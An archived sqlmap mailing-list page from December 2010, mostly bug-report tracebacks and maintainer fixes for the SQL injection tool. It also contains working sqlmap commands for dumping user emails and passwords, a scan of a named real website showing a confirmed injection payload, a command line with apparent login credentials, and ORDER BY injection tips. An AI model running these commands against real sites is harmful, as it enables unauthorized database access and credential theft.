sqlmap-users Mailing List for sqlmap (Page 114)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Miroslav S. <mir...@gm...> - 2010-12-28 13:36:23
|
Hi. First I thought that this was some kind of python problem, but this moment I realized that you've probably used non-ASCII compatible cookie and/or data. Well, I am not sure that python supports net sending of unicode characters at the lowest level. Will research. KR On Tue, Dec 28, 2010 at 6:39 AM, black zero <tim...@gm...> wrote: > sqlmap version: 0.9-dev (r2817) > Python version: 2.6.5 > Operating system: posix > Traceback (most recent call last): > File "sqlmap.py", line 79, in main > start() > File "/home/z00/sqlmap-dev/lib/controller/controller.py", line 248, in > start > if not checkConnection(suppressOutput=conf.forms) or not > checkString() or not checkRegexp(): > File "/home/z00/sqlmap-dev/lib/controller/checks.py", line 764, in > checkConnection > page, _ = Request.queryPage(content=True) > File "/home/z00/sqlmap-dev/lib/request/connect.py", line 438, in queryPage > page, headers = Connect.getPage(url=uri, get=get, post=post, > cookie=cookie, ua=ua, silent=silent, method=method, > auxHeaders=auxHeaders, response=response, raise404=raise404, > ignoreTimeout=timeBasedCompare) > File "/home/z00/sqlmap-dev/lib/request/connect.py", line 189, in getPage > conn = urllib2.urlopen(req) > File "/usr/lib/python2.6/urllib2.py", line 126, in urlopen > return _opener.open(url, data, timeout) > File "/usr/lib/python2.6/urllib2.py", line 391, in open > response = self._open(req, data) > File "/usr/lib/python2.6/urllib2.py", line 409, in _open > '_open', req) > File "/usr/lib/python2.6/urllib2.py", line 369, in _call_chain > result = func(*args) > File "/usr/lib/python2.6/urllib2.py", line 1169, in https_open > return self.do_open(httplib.HTTPSConnection, req) > File "/usr/lib/python2.6/urllib2.py", line 1133, in do_open > h.request(req.get_method(), req.get_selector(), req.data, headers) > File "/usr/lib/python2.6/httplib.py", line 910, in request > self._send_request(method, url, body, headers) > File "/usr/lib/python2.6/httplib.py", line 947, in _send_request > self.endheaders() > File "/usr/lib/python2.6/httplib.py", line 904, in endheaders > self._send_output() > File "/usr/lib/python2.6/httplib.py", line 776, in _send_output > self.send(msg) > File "/usr/lib/python2.6/httplib.py", line 755, in send > self.sock.sendall(str) > File "/usr/lib/python2.6/ssl.py", line 203, in sendall > v = self.send(data[count:]) > File "/usr/lib/python2.6/ssl.py", line 94, in <lambda> > self.send = lambda data, flags=0: SSLSocket.send(self, data, flags) > File "/usr/lib/python2.6/ssl.py", line 174, in send > v = self._sslobj.write(data) > UnicodeEncodeError: 'ascii' codec can't encode character u'\u0131' in > position 307: ordinal not in range(128) > > > ------------------------------------------------------------------------------ > Learn how Oracle Real Application Clusters (RAC) One Node allows customers > to consolidate database storage, standardize their database environment, > and, > should the need arise, upgrade to a full multi-node Oracle RAC database > without downtime or disruption > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: black z. <tim...@gm...> - 2010-12-28 05:39:09
|
sqlmap version: 0.9-dev (r2817)
Python version: 2.6.5
Operating system: posix
Traceback (most recent call last):
File "sqlmap.py", line 79, in main
start()
File "/home/z00/sqlmap-dev/lib/controller/controller.py", line 248, in start
if not checkConnection(suppressOutput=conf.forms) or not
checkString() or not checkRegexp():
File "/home/z00/sqlmap-dev/lib/controller/checks.py", line 764, in
checkConnection
page, _ = Request.queryPage(content=True)
File "/home/z00/sqlmap-dev/lib/request/connect.py", line 438, in queryPage
page, headers = Connect.getPage(url=uri, get=get, post=post,
cookie=cookie, ua=ua, silent=silent, method=method,
auxHeaders=auxHeaders, response=response, raise404=raise404,
ignoreTimeout=timeBasedCompare)
File "/home/z00/sqlmap-dev/lib/request/connect.py", line 189, in getPage
conn = urllib2.urlopen(req)
File "/usr/lib/python2.6/urllib2.py", line 126, in urlopen
return _opener.open(url, data, timeout)
File "/usr/lib/python2.6/urllib2.py", line 391, in open
response = self._open(req, data)
File "/usr/lib/python2.6/urllib2.py", line 409, in _open
'_open', req)
File "/usr/lib/python2.6/urllib2.py", line 369, in _call_chain
result = func(*args)
File "/usr/lib/python2.6/urllib2.py", line 1169, in https_open
return self.do_open(httplib.HTTPSConnection, req)
File "/usr/lib/python2.6/urllib2.py", line 1133, in do_open
h.request(req.get_method(), req.get_selector(), req.data, headers)
File "/usr/lib/python2.6/httplib.py", line 910, in request
self._send_request(method, url, body, headers)
File "/usr/lib/python2.6/httplib.py", line 947, in _send_request
self.endheaders()
File "/usr/lib/python2.6/httplib.py", line 904, in endheaders
self._send_output()
File "/usr/lib/python2.6/httplib.py", line 776, in _send_output
self.send(msg)
File "/usr/lib/python2.6/httplib.py", line 755, in send
self.sock.sendall(str)
File "/usr/lib/python2.6/ssl.py", line 203, in sendall
v = self.send(data[count:])
File "/usr/lib/python2.6/ssl.py", line 94, in <lambda>
self.send = lambda data, flags=0: SSLSocket.send(self, data, flags)
File "/usr/lib/python2.6/ssl.py", line 174, in send
v = self._sslobj.write(data)
UnicodeEncodeError: 'ascii' codec can't encode character u'\u0131' in
position 307: ordinal not in range(128)
|
|
From: Miroslav S. <mir...@gm...> - 2010-12-26 11:00:09
|
Hi all. One quick update. Support for --dump on MS Access is implemented. You'll probably get familiar with the process itself as the table and column names are "bruteforced/guessed" by usage of a compiled word lists, so just a friendly tip, use --threads when doing it so (--threads=10 in --tables and --columns would suffice) one case example: 1) python sqlmap.py -u "xxx.xxx.xxx.xxx?id=11" --tables --threads=10 ... Database: None [4 tables] +------------+ | users | | newsletter | +------------+ 2) python sqlmap.py -u "xxx.xxx.xxx.xxx?id=11" --columns -T users --threads=10 ... +--------+-------------+ | Column | Type | +--------+-------------+ | name | non-numeric | | password | non-numeric | | email | non-numeric | +--------+-------------+ 3) python sqlmap.py -u "xxx.xxx.xxx.xxx?id=11" --dump -T users -C email,password --threads=10 ... Of course, you can use quick switches like --dump-all and --dump -T (without prior --columns and/or --tables), but this way you'll have more control of the process Kind regards. -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2010-12-26 09:33:04
|
Hi. Find the issue "patched" in the latest commit. It seems that this was a known python bug (http://bugs.python.org/issue8797). Kind regards. On Fri, Dec 24, 2010 at 11:05 PM, <nig...@em...> wrote: > sqlmap -u " > http://xxxxxxxxxx.xxx/xxxxx/content.php?show=videos§ion=1&videoset=323" > -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --auth-type=basic > --auth-cred=xxxxx:xxxxx --level 5 --risk 3 -o --tables -D xxxxx > > This is only a small part of the error. My cmd window can´t show the hole > error message. The window buffer in layout settings is to small ^^ But i > think it was always the same error message. ;) > > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 208, in > http_open > return self.do_open(HTTPConnection, req) > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 205, in > do_open > return self.parent.error('http', req, r, r.status, r.reason, r.msg) > File "C:\Python26\lib\urllib2.py", line 429, in error > result = self._call_chain(*args) > File "C:\Python26\lib\urllib2.py", line 369, in _call_chain > result = func(*args) > File "C:\Python26\lib\urllib2.py", line 855, in http_error_401 > url, req, headers) > File "C:\Python26\lib\urllib2.py", line 833, in http_error_auth_reqed > return self.retry_http_basic_auth(host, req, realm) > File "C:\Python26\lib\urllib2.py", line 843, in retry_http_basic_auth > return self.parent.open(req, timeout=req.timeout) > File "C:\Python26\lib\urllib2.py", line 391, in open > response = self._open(req, data) > File "C:\Python26\lib\urllib2.py", line 409, in _open > '_open', req) > File "C:\Python26\lib\urllib2.py", line 369, in _call_chain > result = func(*args) > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 208, in > http_open > return self.do_open(HTTPConnection, req) > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 205, in > do_open > return self.parent.error('http', req, r, r.status, r.reason, r.msg) > File "C:\Python26\lib\urllib2.py", line 429, in error > result = self._call_chain(*args) > File "C:\Python26\lib\urllib2.py", line 369, in _call_chain > result = func(*args) > File "C:\Python26\lib\urllib2.py", line 855, in http_error_401 > url, req, headers) > File "C:\Python26\lib\urllib2.py", line 833, in http_error_auth_reqed > return self.retry_http_basic_auth(host, req, realm) > File "C:\Python26\lib\urllib2.py", line 843, in retry_http_basic_auth > return self.parent.open(req, timeout=req.timeout) > File "C:\Python26\lib\urllib2.py", line 391, in open > response = self._open(req, data) > File "C:\Python26\lib\urllib2.py", line 409, in _open > '_open', req) > File "C:\Python26\lib\urllib2.py", line 369, in _call_chain > result = func(*args) > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 208, in > http_open > return self.do_open(HTTPConnection, req) > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 180, in > do_open > r = h.getresponse() > File "C:\Python26\lib\httplib.py", line 984, in getresponse > method=self._method) > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 233, in > __init__ > httplib.HTTPResponse.__init__(self, sock, debuglevel, method) > File "C:\Python26\lib\httplib.py", line 330, in __init__ > self.fp = sock.makefile('rb', 0) > File "C:\Python26\lib\socket.py", line 210, in makefile > return _fileobject(self._sock, mode, bufsize) > RuntimeError: maximum recursion depth exceeded > > [*] shutting down at: 22:35:52 > > > ------------------------------------------------------------------------------ > Learn how Oracle Real Application Clusters (RAC) One Node allows customers > to consolidate database storage, standardize their database environment, > and, > should the need arise, upgrade to a full multi-node Oracle RAC database > without downtime or disruption > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2010-12-26 09:06:33
|
Hi Alessio. I've replied to you yesterday privately, but just to be official, fixed and committed. KR On Sat, Dec 25, 2010 at 9:49 AM, Alessio Dalla Piazza < ale...@gm...> wrote: > whit args --users > sqlmap version: 0.9-dev > Python version: 2.6.6 > Operating system: posix > Traceback (most recent call last): > File "sqlmap.py", line 79, in main > start() > File "/home/clshack/sqlmap/lib/controller/controller.py", line 401, in > start > action() > File "/home/clshack/sqlmap/lib/controller/action.py", line 77, in action > conf.dumper.users(conf.dbmsHandler.getUsers()) > File "/home/clshack/sqlmap/plugins/generic/enumeration.py", line 149, in > getUsers > rootQuery = queries[kb.dbms].users > File "/home/clshack/sqlmap/extra/xmlobject/xmlobject.py", line 369, in > __getattr__ > raise AttributeError(attr) > AttributeError: users > > [*] shutting down at: 09:46:34 > > > And: > clshack@clshackUB:~/sqlmap$ python sqlmap.py -u > http://www.marconivr.it/include/newsreader.asp?IDNews=298 --current-user > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 09:46:19 > > [09:46:19] [INFO] using '/home/clshack/sqlmap/output/ > www.marconivr.it/session' as session file > [09:46:19] [INFO] resuming injection data from session file > [09:46:19] [INFO] resuming back-end DBMS 'microsoft access' from session > file > [09:46:19] [INFO] testing connection to the target url > sqlmap identified the following injection points with 0 HTTP(s) requests: > --- > Place: GET > Parameter: IDNews > Type: boolean-based blind > Title: AND boolean-based blind - WHERE clause > Payload: IDNews=298 AND 6823=6823 > --- > > [09:46:20] [INFO] the back-end DBMS is Microsoft Access > web server operating system: Windows 2003 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft Access > [09:46:20] [INFO] fetching current user > > [09:46:20] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run > with the latest development version from the Subversion repository. If the > exception persists, please send by e-mail to > sql...@li... the command line, the following text > and any information needed to reproduce the bug. The developers will try to > reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 0.9-dev > Python version: 2.6.6 > Operating system: posix > Traceback (most recent call last): > File "sqlmap.py", line 79, in main > start() > File "/home/clshack/sqlmap/lib/controller/controller.py", line 401, in > start > action() > File "/home/clshack/sqlmap/lib/controller/action.py", line 68, in action > conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser()) > File "/home/clshack/sqlmap/plugins/generic/enumeration.py", line 111, in > getCurrentUser > query = queries[kb.dbms].current_user.query > File "/home/clshack/sqlmap/extra/xmlobject/xmlobject.py", line 369, in > __getattr__ > raise AttributeError(attr) > AttributeError: query > > [*] shutting down at: 09:46:20 > > Happy Christmas and Happy new year-- > Alessio Dalla Piazza > *http://www.clshack.it* <http://www.clshack.it> > > Contributor at *BackBox* Linux > http://www.backbox.org > > > > ------------------------------------------------------------------------------ > Learn how Oracle Real Application Clusters (RAC) One Node allows customers > to consolidate database storage, standardize their database environment, > and, > should the need arise, upgrade to a full multi-node Oracle RAC database > without downtime or disruption > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2010-12-26 09:05:30
|
Hi nightman. This is probably related to this: http://bugs.python.org/issue8797, http://mercurial.selenic.com/bts/issue2179 I'll try to find some kind of patch for this one. KR p.s. just one question. were those credentials used in this example valid/OK/good because one of titles was "Recursion in urllib when pushing with incorrect password". On Fri, Dec 24, 2010 at 11:05 PM, <nig...@em...> wrote: > sqlmap -u " > http://xxxxxxxxxx.xxx/xxxxx/content.php?show=videos§ion=1&videoset=323" > -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --auth-type=basic > --auth-cred=xxxxx:xxxxx --level 5 --risk 3 -o --tables -D xxxxx > > This is only a small part of the error. My cmd window can´t show the hole > error message. The window buffer in layout settings is to small ^^ But i > think it was always the same error message. ;) > > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 208, in > http_open > return self.do_open(HTTPConnection, req) > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 205, in > do_open > return self.parent.error('http', req, r, r.status, r.reason, r.msg) > File "C:\Python26\lib\urllib2.py", line 429, in error > result = self._call_chain(*args) > File "C:\Python26\lib\urllib2.py", line 369, in _call_chain > result = func(*args) > File "C:\Python26\lib\urllib2.py", line 855, in http_error_401 > url, req, headers) > File "C:\Python26\lib\urllib2.py", line 833, in http_error_auth_reqed > return self.retry_http_basic_auth(host, req, realm) > File "C:\Python26\lib\urllib2.py", line 843, in retry_http_basic_auth > return self.parent.open(req, timeout=req.timeout) > File "C:\Python26\lib\urllib2.py", line 391, in open > response = self._open(req, data) > File "C:\Python26\lib\urllib2.py", line 409, in _open > '_open', req) > File "C:\Python26\lib\urllib2.py", line 369, in _call_chain > result = func(*args) > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 208, in > http_open > return self.do_open(HTTPConnection, req) > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 205, in > do_open > return self.parent.error('http', req, r, r.status, r.reason, r.msg) > File "C:\Python26\lib\urllib2.py", line 429, in error > result = self._call_chain(*args) > File "C:\Python26\lib\urllib2.py", line 369, in _call_chain > result = func(*args) > File "C:\Python26\lib\urllib2.py", line 855, in http_error_401 > url, req, headers) > File "C:\Python26\lib\urllib2.py", line 833, in http_error_auth_reqed > return self.retry_http_basic_auth(host, req, realm) > File "C:\Python26\lib\urllib2.py", line 843, in retry_http_basic_auth > return self.parent.open(req, timeout=req.timeout) > File "C:\Python26\lib\urllib2.py", line 391, in open > response = self._open(req, data) > File "C:\Python26\lib\urllib2.py", line 409, in _open > '_open', req) > File "C:\Python26\lib\urllib2.py", line 369, in _call_chain > result = func(*args) > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 208, in > http_open > return self.do_open(HTTPConnection, req) > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 180, in > do_open > r = h.getresponse() > File "C:\Python26\lib\httplib.py", line 984, in getresponse > method=self._method) > File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 233, in > __init__ > httplib.HTTPResponse.__init__(self, sock, debuglevel, method) > File "C:\Python26\lib\httplib.py", line 330, in __init__ > self.fp = sock.makefile('rb', 0) > File "C:\Python26\lib\socket.py", line 210, in makefile > return _fileobject(self._sock, mode, bufsize) > RuntimeError: maximum recursion depth exceeded > > [*] shutting down at: 22:35:52 > > > ------------------------------------------------------------------------------ > Learn how Oracle Real Application Clusters (RAC) One Node allows customers > to consolidate database storage, standardize their database environment, > and, > should the need arise, upgrade to a full multi-node Oracle RAC database > without downtime or disruption > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Alessio D. P. <ale...@gm...> - 2010-12-25 08:50:08
|
whit args --users
sqlmap version: 0.9-dev
Python version: 2.6.6
Operating system: posix
Traceback (most recent call last):
File "sqlmap.py", line 79, in main
start()
File "/home/clshack/sqlmap/lib/controller/controller.py", line 401, in
start
action()
File "/home/clshack/sqlmap/lib/controller/action.py", line 77, in action
conf.dumper.users(conf.dbmsHandler.getUsers())
File "/home/clshack/sqlmap/plugins/generic/enumeration.py", line 149, in
getUsers
rootQuery = queries[kb.dbms].users
File "/home/clshack/sqlmap/extra/xmlobject/xmlobject.py", line 369, in
__getattr__
raise AttributeError(attr)
AttributeError: users
[*] shutting down at: 09:46:34
And:
clshack@clshackUB:~/sqlmap$ python sqlmap.py -u
http://www.marconivr.it/include/newsreader.asp?IDNews=298 --current-user
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 09:46:19
[09:46:19] [INFO] using '/home/clshack/sqlmap/output/
www.marconivr.it/session' as session file
[09:46:19] [INFO] resuming injection data from session file
[09:46:19] [INFO] resuming back-end DBMS 'microsoft access' from session
file
[09:46:19] [INFO] testing connection to the target url
sqlmap identified the following injection points with 0 HTTP(s) requests:
---
Place: GET
Parameter: IDNews
Type: boolean-based blind
Title: AND boolean-based blind - WHERE clause
Payload: IDNews=298 AND 6823=6823
---
[09:46:20] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[09:46:20] [INFO] fetching current user
[09:46:20] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
with the latest development version from the Subversion repository. If the
exception persists, please send by e-mail to
sql...@li... the command line, the following text and
any information needed to reproduce the bug. The developers will try to
reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9-dev
Python version: 2.6.6
Operating system: posix
Traceback (most recent call last):
File "sqlmap.py", line 79, in main
start()
File "/home/clshack/sqlmap/lib/controller/controller.py", line 401, in
start
action()
File "/home/clshack/sqlmap/lib/controller/action.py", line 68, in action
conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())
File "/home/clshack/sqlmap/plugins/generic/enumeration.py", line 111, in
getCurrentUser
query = queries[kb.dbms].current_user.query
File "/home/clshack/sqlmap/extra/xmlobject/xmlobject.py", line 369, in
__getattr__
raise AttributeError(attr)
AttributeError: query
[*] shutting down at: 09:46:20
Happy Christmas and Happy new year--
Alessio Dalla Piazza
*http://www.clshack.it* <http://www.clshack.it>
Contributor at *BackBox* Linux
http://www.backbox.org
|
|
From: <nig...@em...> - 2010-12-24 22:05:46
|
sqlmap -u "http://xxxxxxxxxx.xxx/xxxxx/content.php?show=videos§ion=1&videoset=323" -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --auth-type=basic --auth-cred=xxxxx:xxxxx --level 5 --risk 3 -o --tables -D xxxxx This is only a small part of the error. My cmd window can´t show the hole error message. The window buffer in layout settings is to small ^^ But i think it was always the same error message. ;) File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 208, in http_open return self.do_open(HTTPConnection, req) File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 205, in do_open return self.parent.error('http', req, r, r.status, r.reason, r.msg) File "C:\Python26\lib\urllib2.py", line 429, in error result = self._call_chain(*args) File "C:\Python26\lib\urllib2.py", line 369, in _call_chain result = func(*args) File "C:\Python26\lib\urllib2.py", line 855, in http_error_401 url, req, headers) File "C:\Python26\lib\urllib2.py", line 833, in http_error_auth_reqed return self.retry_http_basic_auth(host, req, realm) File "C:\Python26\lib\urllib2.py", line 843, in retry_http_basic_auth return self.parent.open(req, timeout=req.timeout) File "C:\Python26\lib\urllib2.py", line 391, in open response = self._open(req, data) File "C:\Python26\lib\urllib2.py", line 409, in _open '_open', req) File "C:\Python26\lib\urllib2.py", line 369, in _call_chain result = func(*args) File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 208, in http_open return self.do_open(HTTPConnection, req) File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 205, in do_open return self.parent.error('http', req, r, r.status, r.reason, r.msg) File "C:\Python26\lib\urllib2.py", line 429, in error result = self._call_chain(*args) File "C:\Python26\lib\urllib2.py", line 369, in _call_chain result = func(*args) File "C:\Python26\lib\urllib2.py", line 855, in http_error_401 url, req, headers) File "C:\Python26\lib\urllib2.py", line 833, in http_error_auth_reqed return self.retry_http_basic_auth(host, req, realm) File "C:\Python26\lib\urllib2.py", line 843, in retry_http_basic_auth return self.parent.open(req, timeout=req.timeout) File "C:\Python26\lib\urllib2.py", line 391, in open response = self._open(req, data) File "C:\Python26\lib\urllib2.py", line 409, in _open '_open', req) File "C:\Python26\lib\urllib2.py", line 369, in _call_chain result = func(*args) File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 208, in http_open return self.do_open(HTTPConnection, req) File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 180, in do_open r = h.getresponse() File "C:\Python26\lib\httplib.py", line 984, in getresponse method=self._method) File "C:\pentest\sqlmap.0.9-1\extra\keepalive\keepalive.py", line 233, in __init__ httplib.HTTPResponse.__init__(self, sock, debuglevel, method) File "C:\Python26\lib\httplib.py", line 330, in __init__ self.fp = sock.makefile('rb', 0) File "C:\Python26\lib\socket.py", line 210, in makefile return _fileobject(self._sock, mode, bufsize) RuntimeError: maximum recursion depth exceeded [*] shutting down at: 22:35:52 |
|
From: Miroslav S. <mir...@gm...> - 2010-12-24 02:26:52
|
just to straight things up. i don't say that it's impossible. it's just pain in the ass and i need to implement it :) On Fri, Dec 24, 2010 at 3:16 AM, Miroslav Stampar < mir...@gm...> wrote: > Has anybody ever succeeded in dumping MS Access table records from a > vulnerable site (by using plain sql injection payloads)? If the answer is > yes I promise that I'll buy you 10 beers when we meet. > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2010-12-24 02:16:10
|
Has anybody ever succeeded in dumping MS Access table records from a vulnerable site (by using plain sql injection payloads)? If the answer is yes I promise that I'll buy you 10 beers when we meet. -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-12-22 10:08:42
|
Hi Karl, On 19 December 2010 08:39, Buggy <bug...@gm...> wrote: > ... > I (and sqlmap) have found my new nemesis concerning SQL injection: injecting > in the ORDER BY clause: Good for you. > I am currently doing work on a webapp based on an ORACLE database and can > inject here: > > > > …SELECT foo, bar FROM the_table ORDER BY [INJECTION] sqlmap from Subversion repository has full support to detect and exploit injection points in ORDER BY and GROUP BY clause, regardless of the back-end DBMS. > 1) The mean thing is you cannot use UNION because of the ORDER BY clause True. > => Any hints on how to get a working injection going here? Has anyone ever > encountered this rare case? Yes, several times. svn update and enjoy. Test for ORDER BY clause injection against Oracle --level to be set to 3. We are going to update the user's manual just before the official release of 0.9 stable in a month or two, for the time being sqlmap.py -h will highlight you on the meaning of the new switches (--level, --risk, etc.). > 2) the furthest I have gotten in a try to get into a blind sql injection > situation is the following: > > [INJECTION] = decode ((select 'a' from dual),'a',foo,bar) > > > > …depending on whether ‘a’ or something else is selected, the ouput is sorted > by column ‘foo’ or column ‘bar’ > > > > …the idea is to “ask the question” here (pseudocode): > > decode ((select first letter of first username < chr(128)),TRUE,foo,bar) > > > > …but it doesn’t work as I do not know how to write the question query or how > to decide if the answer is TRUE or FALSE > > > > > > > > => is there some hint how to continue from here and maybe even get the thing > working with sqlmap? Again, svn update. If you want to understand how it works, check yourself xml/payloads.xml file, lines 617-634 in your case. Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Miroslav S. <mir...@gm...> - 2010-12-21 22:35:08
|
fixed ;) kr On Tue, Dec 21, 2010 at 8:13 PM, <nig...@em...> wrote: > sqlmap -u "http://xxxxxx.xxx/content.php?show=galleries§ion=217&page=2" -a C:\pentest\sqlmap-0.9\txt\user-agents.txt --auth-type=basic --auth-cred=mja345:rewind --level 5 --risk 3 --current-user --current-db --is-dba --dbs > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 20:04:07 > > [20:04:08] [INFO] fetched random HTTP User-Agent header from file 'C:\pentest\sqlmap-0.9\txt\user-agents.txt': Mozilla/5.0 > (Macintosh; U; PPC Mac OS X; en) AppleWebKit/124 (KHTML, like Gecko) Safari/125 > [20:04:08] [INFO] using 'C:\pentest\sqlmap-0.9\output\xxxxxx.xxx\session' as session file > [20:04:08] [INFO] resuming injection data from session file > [20:04:08] [INFO] resuming injection data from session file > > [20:04:08] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed > to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 0.9-dev > Python version: 2.6.6 > Operating system: nt > Traceback (most recent call last): > File "C:\pentest\sqlmap-0.9\sqlmap.py", line 79, in main > start() > File "C:\pentest\sqlmap-0.9\lib\controller\controller.py", > line 245, in start > setupTargetEnv() > File "C:\pentest\sqlmap-0.9\lib\core\target.py", line 285, > in setupTargetEnv > __setOutputResume() > File "C:\pentest\sqlmap-0.9\lib\core\target.py", line 170, 